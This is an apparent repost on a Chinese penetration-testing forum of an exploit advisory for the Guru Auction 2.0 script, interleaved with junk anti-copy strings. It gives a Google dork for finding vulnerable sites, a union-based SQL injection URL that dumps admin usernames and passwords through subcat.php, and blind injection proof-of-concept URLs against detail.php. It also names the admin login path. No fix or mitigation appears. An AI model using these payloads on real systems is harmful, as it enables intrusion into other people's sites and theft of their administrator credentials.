中国网络渗透测试联盟
标题:
Guru Auction 2.0多重sql注射
[打印本页]
作者:
admin
时间:
2012-12-31 09:24
标题:
Guru Auction 2.0多重sql注射
Guru Auction 2.0 Multiple SQL Injection Vulnerabilities
$ |) @5 `$ c- D5 H& t" I* I
, f- \. e* P. l- k) g7 ?* Y; z
作者 : v3n0m
" y4 a6 Y: r2 y1 q" g; l" p {
应用 : Guru Auction 2.0
w0 C" w1 b! F% o, w
Price : $49
# _1 e# S$ ]9 x! C; \
Vendor :
http://www.guruscript.com/
+ E+ e$ |+ H2 n6 W0 H& I
Google Dork : inurl:subcat.php?cate_id=
& V- P# V) G3 \; B4 h" T/ y, }
4 l: l. y, M3 q6 x' r
SQLi p0c:
4 N% [2 w( n; p; z+ x3 @
~~~~~~~~~~
) l% z/ W2 _) I7 \
http://domain.tld/
[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--
: |" R" z* E0 l p1 {
3 O# i5 E2 f* b
+ n1 M& W7 M, k$ {8 e1 d$ r3 Y3 I
盲注 p0c:
) j& C! ? N4 i9 w9 U
~~~~~~~~~~
- U" F- K, L; F# k% L/ j, r! R$ P
http://www.political-security.com
/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
7 l$ L" v, O2 C! e" i
http://domain.tld/
[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false
, @4 w4 m1 U, v8 ~; H) o) c
" Z6 |% p3 I% b' G u* ]
管理登录入口:
, q; A* M0 ~: k) D t: Z
~~~~~~~~~~
+ Q/ Q$ f- u# e! T
http://domain.tld/
[path]/admin/
; `7 W% C% k& {5 w% R* P
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2